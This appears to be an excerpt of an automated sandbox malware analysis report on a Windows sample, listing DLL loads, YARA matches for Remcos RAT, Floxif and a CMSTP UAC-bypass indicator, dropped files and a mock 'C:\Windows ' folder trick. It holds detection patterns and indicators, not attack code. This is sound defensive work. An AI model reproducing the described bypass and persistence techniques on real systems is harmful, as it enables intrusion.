                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ????.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ?????.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: system.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ????.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ?????.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: system.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ????.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFSection loaded: ??l.dll
                        Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                        Source: netutils.dll.19.drStatic PE information: Number of sections : 19 > 10
                        Source: 0vJrK0NCd1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FloodFix author = ditekSHen, description = Detects FloodFix
                        Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Floxif_Generic date = 2018-05-11, author = Florian Roth, description = Detects Floxif Malware, score = de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FloodFix author = ditekSHen, description = Detects FloodFix
                        Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Floxif_Generic date = 2018-05-11, author = Florian Roth, description = Detects Floxif Malware, score = de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPEDMatched rule: MALWARE_Win_FloodFix author = ditekSHen, description = Detects FloodFix
                        Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPEDMatched rule: MAL_Floxif_Generic date = 2018-05-11, author = Florian Roth, description = Detects Floxif Malware, score = de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp, type: DROPPEDMatched rule: Malware_Floxif_mpsvc_dll date = 2017-04-07, hash1 = 1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14, author = Florian Roth, description = Malware - Floxif, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile deleted: C:\Windows \System32\NETUTILS.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows Jump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: String function: 04E38153 appears 48 times
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.371668032.0000000002F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLEAUT32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLanguagePack vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHELL32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePOWRPROF.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecomctl32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 0vJrK0NCd1.exe
